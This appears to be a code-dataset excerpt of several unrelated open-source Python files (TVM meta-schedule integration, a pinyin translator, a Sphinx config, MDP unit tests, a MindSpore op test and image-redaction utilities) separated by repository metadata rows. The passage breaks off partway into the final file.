        mod: IRModule,
        target: Target,
        dispatched: List[IRModule],
    ) -> None:
        # Construct the underlying C++ object through the FFI; the fields are
        # stored on the TVM object rather than as plain Python attributes.
        self.__init_handle_by_constructor__(
            _ffi_api.ExtractedTask,  # type: ignore # pylint: disable=no-member
            task_name,
            mod,
            target,
            dispatched,
        )
@register_object("meta_schedule.MetaScheduleContext")
class MetaScheduleContext(Object):
    """A context manager interface for the integration"""

    def query(
        self,
        task_name: str,
        mod: IRModule,
        target: Target,
        dispatched: Optional[List[IRModule]],
    ) -> Union[IRModule, RelayFunc, PrimFunc, None]:
        """The entry point of the integration

        Parameters
        ----------
        task_name : str
            The name of the task extracted
        mod : IRModule
            The high-level IR
        target: Target
            Target Info
        dispatched : Optional[List[IRModule]]
            A list of low-level IRs that the high-level IR could potentially dispatch to

        Returns
        -------
        result : Union[IRModule, RelayFunc, PrimFunc, None]
            There are different types of the output:
            1) NullOpt if there is no feedback hint;
            2) tir::PrimFunc if `mod` should be lowered to a PrimFunc;
            3) relay::Function if `mod` should be dispatched to BYOC workflow;
            4) IRModule for unified dispatch
        """
        # Delegate to the C++ implementation of the subclass's query logic.
        return _ffi_api.MetaScheduleContextQuery(  # type: ignore # pylint: disable=no-member
            self,
            task_name,
            mod,
            target,
            dispatched,
        )

    @staticmethod
    def current() -> Optional["MetaScheduleContext"]:
        """The context manager in the current scope

        Returns
        -------
        ctx : Optional[MetaScheduleContext]
            The MetaScheduleContext in the current scope.
            NullOpt if it's currently not under any MetaScheduleContext.
        """
        return _ffi_api.MetaScheduleContextCurrent()  # type: ignore # pylint: disable=no-member

    @staticmethod
    def query_inside_with_scope(
        task_name: str,
        mod: IRModule,
        target: Target,
        dispatched: Optional[List[IRModule]],
    ) -> Union[IRModule, RelayFunc, PrimFunc, None]:
        """The entry point of the integration workflow. The compilation process of the high-level
        IR should call this method for task extraction and for feedback hints

        Basically, this method is equivalent to:

        .. code-block:: python

            def query_inside_with_scope(task_name, mod, dispatched):
                ctx = MetaScheduleContext.current()
                assert ctx is not None
                ctx.query(task_name, mod, target, dispatched)

        Parameters
        ----------
        task_name : str
            The name of the task
        mod : IRModule
            The high-level IR
        target: Target
            Target
        dispatched : Optional[List[IRModule]]
            A list of low-level IRs that the high-level IR could potentially dispatch to

        Returns
        -------
        result : Union[IRModule, RelayFunc, PrimFunc, None]
            There are different types of the output:
            1) NullOpt if there is no feedback hint;
            2) tir::PrimFunc if `mod` should be lowered to a PrimFunc;
            3) relay::Function if `mod` should be dispatched to BYOC workflow;
            4) IRModule for unified dispatch
        """
        return _ffi_api.MetaScheduleContextQueryInsideWithScope(  # type: ignore # pylint: disable=no-member
            task_name,
            mod,
            target,
            dispatched,
        )

    def __enter__(self) -> "MetaScheduleContext":
        """Entering the scope of the context manager"""
        _ffi_api.MetaScheduleContextEnterScope(self)  # type: ignore # pylint: disable=no-member
        return self

    def __exit__(self, ptype, value, trace) -> None:
        """Exiting the scope of the context manager"""
        _ffi_api.MetaScheduleContextExitScope(self)  # type: ignore # pylint: disable=no-member
@register_object("meta_schedule.TaskExtraction")
class TaskExtraction(MetaScheduleContext):
    """An integration context for task extraction"""

    # Populated by the C++ side on each query while this context is active.
    tasks: List[ExtractedTask]
    """The extracted tasks"""

    def __init__(self) -> None:
        self.__init_handle_by_constructor__(_ffi_api.TaskExtraction)  # type: ignore # pylint: disable=no-member
@register_object("meta_schedule.ApplyHistoryBest")
class ApplyHistoryBest(MetaScheduleContext):
    """An integration context that allows application of historically best record from database"""

    database: Database
    """ The database to be queried from"""

    def __init__(self, database) -> None:
        # Wrap the given tuning database so queries return its best records.
        self.__init_handle_by_constructor__(_ffi_api.ApplyHistoryBest, database)  # type: ignore # pylint: disable=no-member
def extract_task_from_relay(
    mod: Union[IRModule, RelayFunc],
    target: Target,
    params: Optional[Dict[str, NDArray]] = None,
    *,
    opt_level: int = 3,
    pass_config: Optional[Dict[str, Any]] = None,
    disabled_pass: Optional[List[str]] = None,
) -> List[ExtractedTask]:
    """Extract tuning tasks from a relay program.

    Parameters
    ----------
    mod : Union[tvm.IRModule, tvm.relay.Function]
        The module or function to tune
    target : tvm.target.Target
        The compilation target
    params : Optional[Dict[str, tvm.runtime.NDArray]]
        The associated parameters of the program
    opt_level : int
        The optimization level of the compiler
    pass_config : Optional[Dict[str, Any]]
        The pass config of the compiler. Defaults to
        {"relay.backend.use_meta_schedule": True}.
    disabled_pass : Optional[List[str]]
        The list of disabled passes of the compiler. Defaults to [].

    Returns
    -------
    tasks: List[ExtractedTask]
        The tasks extracted from this network
    """
    # Bug fix: the original used mutable default arguments ({} and []),
    # which are shared across calls and can be silently mutated by the
    # compilation pipeline. Use None sentinels instead.
    if pass_config is None:
        pass_config = {"relay.backend.use_meta_schedule": True}
    if disabled_pass is None:
        disabled_pass = []

    @contextmanager
    def _autotvm_silencer():
        # Temporarily silence autotvm warnings while lowering.
        from tvm import autotvm  # pylint: disable=import-outside-toplevel

        silent = autotvm.GLOBAL_SCOPE.silent
        autotvm.GLOBAL_SCOPE.silent = True
        try:
            yield
        finally:
            autotvm.GLOBAL_SCOPE.silent = silent

    def _thread_run(func: Callable[[], None]) -> None:
        # Run `func` on a fresh thread and block until it finishes, so the
        # compilation gets a clean thread-local state.
        import threading  # pylint: disable=import-outside-toplevel

        thread = threading.Thread(target=func)
        thread.start()
        thread.join()

    env = TaskExtraction()
    if isinstance(mod, RelayFunc):
        mod = IRModule.from_expr(mod)
    if not isinstance(target, Target):
        target = Target(target)

    def _func():
        # Lower the module inside the TaskExtraction context so every task
        # encountered during compilation is recorded on `env`.
        with env, _autotvm_silencer(), transform.PassContext(
            config=pass_config,
            disabled_pass=disabled_pass,
            opt_level=opt_level,
        ):
            compiler = vm.VMCompiler()
            if params:
                compiler.set_params(params)
            compiler.lower(mod, target)

    _thread_run(_func)
    return env.tasks
def extract_task_from_relax(mod: Union[IRModule, RelaxFunc], target: Target) -> List[ExtractedTask]:
    """Extract tuning tasks from a relax program.

    Parameters
    ----------
    mod : Union[tvm.IRModule, tvm.relax.Function]
        The module or function to tune
    target : tvm.target.Target
        The compilation target

    Returns
    -------
    tasks: List[ExtractedTask]
        The tasks extracted from this module
    """
    if isinstance(mod, RelaxFunc):
        mod = IRModule.from_expr(mod)
    if not isinstance(target, Target):
        target = Target(target)
    # One task per partitioned TIR module, named after its sole global var.
    # The second arg to ExtractedTask is supposed to be a high-level IRModule;
    # passing the TIR module there is a workaround.
    return [
        ExtractedTask(
            tir_mod.get_global_vars()[0].name_hint,
            tir_mod,
            target,
            [tir_mod],
        )
        for tir_mod in tir_partitioner(mod)
    ]
| 32.392157 | 124 | 0.64659 |
5db93b558c60b260b7b8b835cd896ec729ad18b6 | 2,271 | py | Python | xmnlp/pinyin/pinyin.py | CGEDJNU/xmnlp | ad2d3c0b8875cf415c3adffc10926605da7a458b | [
"MIT"
] | 1 | 2019-09-12T07:19:58.000Z | 2019-09-12T07:19:58.000Z | xmnlp/pinyin/pinyin.py | TactictNLP/xmnlp | ad2d3c0b8875cf415c3adffc10926605da7a458b | [
"MIT"
] | null | null | null | xmnlp/pinyin/pinyin.py | TactictNLP/xmnlp | ad2d3c0b8875cf415c3adffc10926605da7a458b | [
"MIT"
] | 1 | 2020-04-20T08:58:45.000Z | 2020-04-20T08:58:45.000Z | # !/usr/bin/env python
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
# -------------------------------------------#
# author: sean lee #
# email: xmlee97@gmail.com #
#--------------------------------------------#
"""MIT License
Copyright (c) 2018 Sean
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE."""
import sys
# Python 2 compatibility shim: force UTF-8 as the default string encoding and
# alias `range` to the lazy xrange. No effect under Python 3.
if sys.version_info[0] == 2:
    reload(sys)
    sys.setdefaultencoding('utf8')
    range = xrange
import io
import os
from ..module import Module
from ..utils import native_content
from ..utils.trie import Trie
from ..utils import safe_input
class Pinyin(Module):
    """Chinese-to-pinyin translator backed by a longest-match trie."""

    # Serialization hints for the Module base: persist only the trie.
    __notsave__ = []
    __onlysave__ = ['trie']

    def __init__(self):
        self.trie = Trie()

    def train(self, fpath):
        """Build the trie from dictionary files under <fpath>.

        Each non-empty line is expected to be "<word> <syllable>...", mapping
        a word to its pinyin syllables.
        """
        for fname in self.filelist(fpath):
            with io.open(fname, 'r', encoding='utf-8') as f:
                for line in f:
                    line = safe_input(line)
                    words = line.split()
                    self.trie.add(words[0], words[1:])

    def translate(self, text):
        """Return the pinyin of <text> as a flat list of syllables."""
        ret = []
        for t in self.trie.get(text):
            # Trie hits yield a list/tuple of syllables; misses yield the
            # raw character unchanged.
            if isinstance(t, (list, tuple)):
                # Bug fix: the original did `ret = ret + t`, which raises
                # TypeError when `t` is a tuple (list + tuple) and rebuilds
                # the list each time (quadratic); extend() handles both.
                ret.extend(t)
            else:
                ret.append(t)
        return ret
3f2163c65499202ee2f5c3d3b02077d61371cff9 | 11,000 | py | Python | docs/conf.py | companieshouse/headline-news | 606cd6f3c501ef8157b347561ab230bad49a1b81 | [
"MIT"
] | null | null | null | docs/conf.py | companieshouse/headline-news | 606cd6f3c501ef8157b347561ab230bad49a1b81 | [
"MIT"
] | null | null | null | docs/conf.py | companieshouse/headline-news | 606cd6f3c501ef8157b347561ab230bad49a1b81 | [
"MIT"
] | 1 | 2021-04-10T21:14:10.000Z | 2021-04-10T21:14:10.000Z | # headline-news documentation build configuration file
#
# This file is execfile()d with the current directory set to its containing dir.
#
# Note that not all possible configuration values are present in this autogenerated file.
#
# All configuration values have a default; values that are commented out serve to show the default.
# If extensions (or modules to document with autodoc) are in another directory, add these directories to sys.path here.
# If the directory is relative to the documentation root, use os.path.abspath to make it absolute, like shown here.
# import sys
# sys.path.insert(0, os.path.abspath("."))
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
# needs_sphinx = "1.0"
# Add any Sphinx extension module names here, as strings. They can be extensions coming with Sphinx
# (named 'sphinx.ext.*') or your custom ones.
extensions = [
"sphinx.ext.autodoc",
"sphinx.ext.autosectionlabel",
"sphinx.ext.autosummary",
"sphinx.ext.napoleon",
"myst_parser",
]
# Add any paths that contain templates here, relative to this directory.
templates_path = ["_templates"]
# The suffix(es) of source filenames. You can specify multiple suffixes as a list of strings:
# source_suffix = [".rst", ".md"]
source_suffix = {
".rst": "restructuredtext",
".md": "markdown",
}
# The encoding of source files.
#
# source_encoding = "utf-8-sig"
# The master toctree document.
master_doc = "index"
# General information about the project.
project = "headline-news"
author = "companieshouse"
# The version info for the project you're documenting, acts as replacement for |version| and |release|, also used in
# various other places throughout the built documents.
# The short X.Y.Z version.
version = "0.0.1"
# The full version, including alpha/beta/rc tags.
release = "0.0.1"
# The language for content autogenerated by Sphinx. Refer to documentation for a list of supported languages.
# This is also used if you do content translation via gettext catalogs. Usually you set "language" from the command
# line for these cases.
# language = None
# There are two options for replacing |today|: either, you set today to some non-false value, then it is used:
#
# today = ""
#
# Else, today_fmt is used as the format for a strftime call.
#
# today_fmt = "%B %d, %Y"
# List of patterns, relative to source directory, that match files and directories to ignore when looking for source
# files. These patterns also affect html_static_path and html_extra_path
exclude_patterns = [
"_build",
"Thumbs.db",
".DS_Store",
"README.md"]
# The reST default role (used for this markup: `text`) to use for all documents.
# default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
# add_function_parentheses = True
# If true, the current module name will be prepended to all description unit titles (such as .. function::).
# add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the output. They are ignored by default.
# show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = "sphinx"
# A list of ignored prefixes for module index sorting.
# modindex_common_prefix = []
# If true, keep warnings as 'system message' paragraphs in the built documents.
# keep_warnings = False
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = False
# -- Options for HTML output -------------------------------------------------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for a list of builtin themes.
html_theme = "alabaster"
# Theme options are theme-specific and customize the look and feel of a theme further. For a list of options available
# for each theme, see the documentation.
# html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
# html_theme_path = []
# The name for this set of Sphinx documents. "<project> v<release> documentation" by default.
# html_title = "None"
# A shorter title for the navigation bar. Default is the same as html_title.
# html_short_title = None
# The name of an image file (relative to this directory) to place at the top of the sidebar.
# html_logo = None
# The name of an image file (relative to this directory) to use as a favicon of the docs. This file should be a
# Windows icon file (.ico) being 16x16 or 32x32 pixels large.
# html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here, relative to this directory. They are
# copied after the builtin static files, so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ["_static"]
# Add any extra paths that contain custom files (such as robots.txt or .htaccess) here, relative to this directory.
# These files are copied directly to the root of the documentation.
# html_extra_path = []
# If not None, a 'Last updated on:' timestamp is inserted at every page bottom, using the given strftime format.
# The empty string is equivalent to '%b %d, %Y'.
# html_last_updated_fmt = None
# Custom sidebar templates, maps document names to template names.
# html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to template names.
# html_additional_pages = {}
# If false, no module index is generated.
# html_domain_indices = True
# If false, no index is generated.
# html_use_index = True
# If true, the index is split into individual pages for each letter.
# html_split_index = False
# If true, links to the reST sources are added to the pages.
# html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
# html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
# html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will contain a <link> tag referring to it. The
# value of this option must be the base URL from which the finished HTML is served.
# html_use_opensearch = ""
# This is the file name suffix for HTML files (e.g. ".xhtml").
# html_file_suffix = None
# Language to be used for generating the HTML full-text search index. Sphinx supports the following languages:
# 'da', 'de', 'en', 'es', 'fi', 'fr', 'hu', 'it', 'ja'
# 'nl', 'no', 'pt', 'ro', 'ru', 'sv', 'tr', 'zh'
# html_search_language = "en"
# A dictionary with options for the search language support, empty by default. 'ja' uses this config value. 'zh' user
# can custom change `jieba` dictionary path.
# html_search_options = {"type": "default"}
# The name of a javascript file (relative to the configuration directory) that implements a search results scorer. If
# empty, the default will be used.
# html_search_scorer = "scorer.js"
# Output file base name for HTML help builder.
htmlhelp_basename = "headline-newsdoc"
# -- Options for LaTeX output ------------------------------------------------------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#
# "papersize": "letterpaper",
# The font size ('10pt', '11pt' or '12pt').
#
# "pointsize": "10pt",
# Additional stuff for the LaTeX preamble.
#
# "preamble": "",
# Latex figure (float) alignment
#
# "figure_align": "htbp",
}
# Grouping the document tree into LaTeX files. List of tuples (source start file, target name, title, author,
# documentclass [howto, manual, or own class]).
latex_documents = [
("index",
"headline-news.tex",
u"headline-news Documentation",
u"companieshouse", "manual"),
]
# The name of an image file (relative to this directory) to place at the top of the title page.
# latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts, not chapters.
# latex_use_parts = False
# If true, show page references after internal links.
# latex_show_pagerefs = False
# If true, show URL addresses after external links.
# latex_show_urls = False
# Documents to append as an appendix to all manuals.
# latex_appendices = []
# If false, no module index is generated.
# latex_domain_indices = True
# -- Options for manual page output ------------------------------------------------------------------------------------
# One entry per manual page. List of tuples (source start file, name, description, authors, manual section).
man_pages = [
("index", "headline-news", u"headline-news Documentation",
[u"companieshouse"], 1)
]
# If true, show URL addresses after external links.
# man_show_urls = False
# -- Options for Texinfo output ----------------------------------------------------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples (source start file, target name, title, author, dir
# menu entry, description, category)
texinfo_documents = [
("index", "headline-news", u"headline-news Documentation",
u"companieshouse", "headline-news",
"Code behind the dashboard that helps ‘New Companies’ identify words/phrases in breaking news headlines", "Miscellaneous"),
]
# Documents to append as an appendix to all manuals.
# texinfo_appendices = []
# If false, no module index is generated.
# texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
# texinfo_show_urls = "footnote"
# If true, do not generate a @detailmenu in the "Top" node's menu.
# texinfo_no_detailmenu = False
# -- Options for autosection output ------------------------------------------------------------------------------------
# Prefix document path to section labels, otherwise autogenerated labels would look like 'heading'
# rather than 'path/to/file:heading'
autosectionlabel_prefix_document = True
# -- Options for autosummary output ------------------------------------------------------------------------------------
# Set the autosummary to generate stub files
autosummary_generate = True
# -- Options for Napoleon extension ------------------------------------------------------------------------------------
# Napoleon settings to enable parsing of Google- and NumPy-style docstrings.
# napoleon_google_docstring = True
# napoleon_numpy_docstring = True
# napoleon_include_init_with_doc = False
# napoleon_include_private_with_doc = False
# napoleon_include_special_with_doc = True
# napoleon_use_admonition_for_examples = False
# napoleon_use_admonition_for_notes = False
# napoleon_use_admonition_for_references = False
# napoleon_use_ivar = False
# napoleon_use_param = True
# napoleon_use_rtype = True
# -- Options for MySt --------------------------------------------------------------------------------------------------
# Enforce heading anchors for h1 to h6 headings
myst_heading_anchors = 6
| 36.666667 | 128 | 0.684273 |
1aed4b58f08b1baf98c81a4b8796f3409d43245e | 6,263 | py | Python | tests/test_mdp.py | upsidedownpancake/aima-python | 4f6c7167872d833714625cf3d25cc1f6f7cf15fe | [
"MIT"
] | 1 | 2018-05-12T17:17:05.000Z | 2018-05-12T17:17:05.000Z | tests/test_mdp.py | Abishek10/aima-python | 84586ceb8ea176b8f7d2efc5c913e7acb6004901 | [
"MIT"
] | null | null | null | tests/test_mdp.py | Abishek10/aima-python | 84586ceb8ea176b8f7d2efc5c913e7acb6004901 | [
"MIT"
] | null | null | null | from mdp import *
sequential_decision_environment_1 = GridMDP([[-0.1, -0.1, -0.1, +1],
[-0.1, None, -0.1, -1],
[-0.1, -0.1, -0.1, -0.1]],
terminals=[(3, 2), (3, 1)])
sequential_decision_environment_2 = GridMDP([[-2, -2, -2, +1],
[-2, None, -2, -1],
[-2, -2, -2, -2]],
terminals=[(3, 2), (3, 1)])
sequential_decision_environment_3 = GridMDP([[-1.0, -0.1, -0.1, -0.1, -0.1, 0.5],
[-0.1, None, None, -0.5, -0.1, -0.1],
[-0.1, None, 1.0, 3.0, None, -0.1],
[-0.1, -0.1, -0.1, None, None, -0.1],
[0.5, -0.1, -0.1, -0.1, -0.1, -1.0]],
terminals=[(2, 2), (3, 2), (0, 4), (5, 0)])
def test_value_iteration():
assert value_iteration(sequential_decision_environment, .01) == {
(3, 2): 1.0, (3, 1): -1.0,
(3, 0): 0.12958868267972745, (0, 1): 0.39810203830605462,
(0, 2): 0.50928545646220924, (1, 0): 0.25348746162470537,
(0, 0): 0.29543540628363629, (1, 2): 0.64958064617168676,
(2, 0): 0.34461306281476806, (2, 1): 0.48643676237737926,
(2, 2): 0.79536093684710951}
assert value_iteration(sequential_decision_environment_1, .01) == {
(3, 2): 1.0, (3, 1): -1.0,
(3, 0): -0.0897388258468311, (0, 1): 0.146419707398967840,
(0, 2): 0.30596200514385086, (1, 0): 0.010092796415625799,
(0, 0): 0.00633408092008296, (1, 2): 0.507390193380827400,
(2, 0): 0.15072242145212010, (2, 1): 0.358309043654212570,
(2, 2): 0.71675493618997840}
assert value_iteration(sequential_decision_environment_2, .01) == {
(3, 2): 1.0, (3, 1): -1.0,
(3, 0): -3.5141584808407855, (0, 1): -7.8000009574737180,
(0, 2): -6.1064293596058830, (1, 0): -7.1012549580376760,
(0, 0): -8.5872244532783200, (1, 2): -3.9653547121245810,
(2, 0): -5.3099468802901630, (2, 1): -3.3543366255753995,
(2, 2): -1.7383376462930498}
assert value_iteration(sequential_decision_environment_3, .01) == {
(0, 0): 4.350592130345558, (0, 1): 3.640700980321895, (0, 2): 3.0734806370346943, (0, 3): 2.5754335063434937, (0, 4): -1.0,
(1, 0): 3.640700980321895, (1, 1): 3.129579352304856, (1, 4): 2.0787517066719916,
(2, 0): 3.0259220379893352, (2, 1): 2.5926103577982897, (2, 2): 1.0, (2, 4): 2.507774181360808,
(3, 0): 2.5336747364500076, (3, 2): 3.0, (3, 3): 2.292172805400873, (3, 4): 2.996383110867515,
(4, 0): 2.1014575936349886, (4, 3): 3.1297590518608907, (4, 4): 3.6408806798779287,
(5, 0): -1.0, (5, 1): 2.5756132058995282, (5, 2): 3.0736603365907276, (5, 3): 3.6408806798779287, (5, 4): 4.350771829901593}
def test_policy_iteration():
assert policy_iteration(sequential_decision_environment) == {
(0, 0): (0, 1), (0, 1): (0, 1), (0, 2): (1, 0),
(1, 0): (1, 0), (1, 2): (1, 0), (2, 0): (0, 1),
(2, 1): (0, 1), (2, 2): (1, 0), (3, 0): (-1, 0),
(3, 1): None, (3, 2): None}
assert policy_iteration(sequential_decision_environment_1) == {
(0, 0): (0, 1), (0, 1): (0, 1), (0, 2): (1, 0),
(1, 0): (1, 0), (1, 2): (1, 0), (2, 0): (0, 1),
(2, 1): (0, 1), (2, 2): (1, 0), (3, 0): (-1, 0),
(3, 1): None, (3, 2): None}
assert policy_iteration(sequential_decision_environment_2) == {
(0, 0): (1, 0), (0, 1): (0, 1), (0, 2): (1, 0),
(1, 0): (1, 0), (1, 2): (1, 0), (2, 0): (1, 0),
(2, 1): (1, 0), (2, 2): (1, 0), (3, 0): (0, 1),
(3, 1): None, (3, 2): None}
def test_best_policy():
pi = best_policy(sequential_decision_environment,
value_iteration(sequential_decision_environment, .01))
assert sequential_decision_environment.to_arrows(pi) == [['>', '>', '>', '.'],
['^', None, '^', '.'],
['^', '>', '^', '<']]
pi_1 = best_policy(sequential_decision_environment_1,
value_iteration(sequential_decision_environment_1, .01))
assert sequential_decision_environment_1.to_arrows(pi_1) == [['>', '>', '>', '.'],
['^', None, '^', '.'],
['^', '>', '^', '<']]
pi_2 = best_policy(sequential_decision_environment_2,
value_iteration(sequential_decision_environment_2, .01))
assert sequential_decision_environment_2.to_arrows(pi_2) == [['>', '>', '>', '.'],
['^', None, '>', '.'],
['>', '>', '>', '^']]
pi_3 = best_policy(sequential_decision_environment_3,
value_iteration(sequential_decision_environment_3, .01))
assert sequential_decision_environment_3.to_arrows(pi_3) == [['.', '>', '>', '>', '>', '>'],
['v', None, None, '>', '>', '^'],
['v', None, '.', '.', None, '^'],
['v', '<', 'v', None, None, '^'],
['<', '<', '<', '<', '<', '.']]
def test_transition_model():
    """MDP.T must return the (probability, next-state) pair stored for a state/action."""
    # Hand-built table: state -> action -> (transition probability, successor state).
    transition_model = {
        "A": {"a1": (0.3, "B"), "a2": (0.7, "C")},
        "B": {"a1": (0.5, "B"), "a2": (0.5, "A")},
        "C": {"a1": (0.9, "A"), "a2": (0.1, "B")},
    }
    mdp = MDP(init="A", actlist={"a1","a2"}, terminals={"C"}, states={"A","B","C"}, transitions=transition_model)
    # Each lookup should echo back exactly what the transition table holds.
    assert mdp.T("A","a1") == (0.3, "B")
    assert mdp.T("B","a2") == (0.5, "A")
    assert mdp.T("C","a1") == (0.9, "A")
| 54.938596 | 159 | 0.422641 |
3a9b10c9befc583dd8a232020cfe2bda77aa828d | 1,370 | py | Python | tests/st/ops/ascend/test_tbe_ops/test_square.py | doc22940/mindspore | 21bcdcd8adb97b9171b2822a7ed2c4c138c99607 | [
"Apache-2.0"
] | 1 | 2020-05-13T11:31:21.000Z | 2020-05-13T11:31:21.000Z | tests/st/ops/ascend/test_tbe_ops/test_square.py | doc22940/mindspore | 21bcdcd8adb97b9171b2822a7ed2c4c138c99607 | [
"Apache-2.0"
] | null | null | null | tests/st/ops/ascend/test_tbe_ops/test_square.py | doc22940/mindspore | 21bcdcd8adb97b9171b2822a7ed2c4c138c99607 | [
"Apache-2.0"
] | null | null | null | # Copyright 2020 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
from mindspore import Tensor
from mindspore.ops import operations as P
import mindspore.nn as nn
from mindspore.common.api import ms_function
import numpy as np
import mindspore.context as context
from mindspore.common.initializer import initializer
from mindspore.common.parameter import Parameter
context.set_context(mode=context.GRAPH_MODE, device_target="Ascend")
class Net(nn.Cell):
    """Minimal cell wrapping the element-wise Square operator under test."""
    def __init__(self):
        super(Net, self).__init__()
        self.square = P.Square()  # TBE Square primitive
    def construct(self, x):
        """Return x squared element-wise."""
        return self.square(x)
# Fixed input for the Square-op smoke test.
x = np.array([1.0, 4.0, 9.0]).astype(np.float32)
def test_net():
    """Run the Square op on Ascend and verify against the numpy reference."""
    square = Net()
    output = square(Tensor(x))
    print(x)
    print(output.asnumpy())
    # The original test only printed the result; actually assert correctness
    # so a wrong kernel output fails the test instead of passing silently.
    assert np.allclose(output.asnumpy(), x * x)
3ab4b4cbf2e2ff0e28c788c64a808a069500dde7 | 11,794 | py | Python | tools/common/image_utils.py | tribhuvanesh/visual_redactions | 93fac7b5cd9fc7e81341380408df6a8a4f8f6189 | [
"Apache-2.0"
] | 14 | 2018-07-03T09:30:02.000Z | 2020-12-23T05:46:11.000Z | tools/common/image_utils.py | tribhuvanesh/visual_redactions | 93fac7b5cd9fc7e81341380408df6a8a4f8f6189 | [
"Apache-2.0"
] | 2 | 2018-07-03T13:42:33.000Z | 2018-09-15T13:17:17.000Z | tools/common/image_utils.py | tribhuvanesh/visual_redactions | 93fac7b5cd9fc7e81341380408df6a8a4f8f6189 | [
"Apache-2.0"
] | 9 | 2018-07-25T02:47:43.000Z | 2022-02-17T13:28:49.000Z | #!/usr/bin/python
"""This is a short description.
Replace this with a more detailed description of what this file contains.
"""
import json
import time
import pickle
import sys
import csv
import argparse
import os
import os.path as osp
import shutil
import numpy as np
import matplotlib.pyplot as plt
from PIL import Image, ImageDraw, ImageFilter
from skimage.segmentation import slic, mark_boundaries
from scipy.misc import imread, imresize
from pycocotools import mask as mask_utils
__author__ = "Tribhuvanesh Orekondy"
__maintainer__ = "Tribhuvanesh Orekondy"
__email__ = "orekondy@mpi-inf.mpg.de"
__status__ = "Development"
def resize_min_side(pil_img, mins_len):
    """Rescale *pil_img* so its shorter side becomes ``mins_len`` pixels.

    The longer side is scaled by the same factor (rounded to the nearest
    integer), preserving the aspect ratio.

    :param pil_img: PIL image
    :param mins_len: target length of the shorter side, in pixels
    :return: the resized PIL image
    """
    w, h = pil_img.size
    short_side, long_side = (w, h) if w < h else (h, w)
    scaled_long = int(np.round(long_side * (mins_len / float(short_side))))
    new_size = (mins_len, scaled_long) if w < h else (scaled_long, mins_len)
    return pil_img.resize(new_size)
def bimask_to_rgba(bimask, color=(95, 242, 186)):
    """Convert a binary mask into an H x W x 4 RGBA float array.

    The alpha channel is the mask itself (values stay in {0, 1}, not
    {0, 255}) and every pixel's RGB planes are filled with ``color``.

    :param bimask: H x W binary mask
    :param color: RGB triple for the color planes (default: mint green)
    :return: H x W x 4 float array
    """
    h, w = bimask.shape
    img_arr = np.zeros((h, w, 4))
    # Alpha channel carries the mask.
    img_arr[:, :, -1] = bimask
    # Broadcast the color across all pixels. The default used to be a
    # mutable np.array created at definition time (shared-mutable-default
    # hazard); an immutable tuple broadcasts identically.
    img_arr[:, :, :3] = color
    return img_arr
def get_image_size(img_path):
    """
    Get image size as (width, height).

    Opened inside a context manager so the underlying file handle is
    released immediately instead of lingering until garbage collection
    (Image.open is lazy and keeps the file open otherwise).

    :param img_path: path to the image file
    :return: (width, height)
    """
    with Image.open(img_path) as im:
        return im.size
def draw_outline_on_img(pil_img, poly, color='yellow', width=4):
    """Return a copy of *pil_img* with *poly* drawn as a line outline.

    :param pil_img: source PIL image (not modified)
    :param poly: point sequence accepted by ImageDraw.line
    :param color: line color
    :param width: line width in pixels
    """
    im = pil_img.copy()
    draw = ImageDraw.Draw(im)
    # Bug fix: the width parameter was previously ignored (hard-coded 4).
    draw.line(poly, fill=color, width=width)
    del draw
    return im
def get_instance_crop(img_path, rle, bbox=None):
    """
    Crop a single instance out of an image, whitening all other pixels.

    :param img_path: Absolute path to image
    :param rle: RLE-encoded instance mask (pycocotools format)
    :param bbox: [x, y, w, h]; derived from the RLE mask when omitted
    :return: PIL image cropped to the instance's bounding box
    """
    if bbox is None:
        # Derive the tight bounding box directly from the mask.
        bbox = mask_utils.toBbox(rle)
    im = Image.open(img_path).convert('RGB')
    imarr = np.asarray(im).copy()
    bimask = mask_utils.decode(rle)
    bimask = np.tile(bimask[:, :, None], 3)  # replicate the mask across the 3 RGB channels
    imarr[bimask == 0] = 255  # Set pixels outside instance as white
    x, y, w, h = bbox
    # PIL crop takes (left, upper, right, lower), hence x + w / y + h.
    masked_im = Image.fromarray(imarr).crop([x, y, x + w, y + h])
    del im
    del imarr
    del bimask
    return masked_im
def redact_img(pil_img, segmentation, fill='black', outline='black'):
